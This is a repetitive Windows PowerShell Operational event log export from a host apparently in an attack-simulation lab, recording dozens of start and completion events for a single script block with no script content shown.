SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472049
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472048
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472047
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472046
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472045
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472044
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472043
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472042
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472041
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472040
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472039
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472038
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472037
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472036
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472035
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472034
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472033
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472032
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472031
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472030
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472029
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472028
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472027
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472026
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472025
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472024
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472023
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472022
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472021
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472020
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472019
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472018
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472017
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472016
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472015
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472014
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472013
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472012
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472011
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472010
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472009
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472008
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472007
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472006
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472005
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472004
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472003
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472002
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472001
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472000
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471999
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471998
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471997
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471996
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471995
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
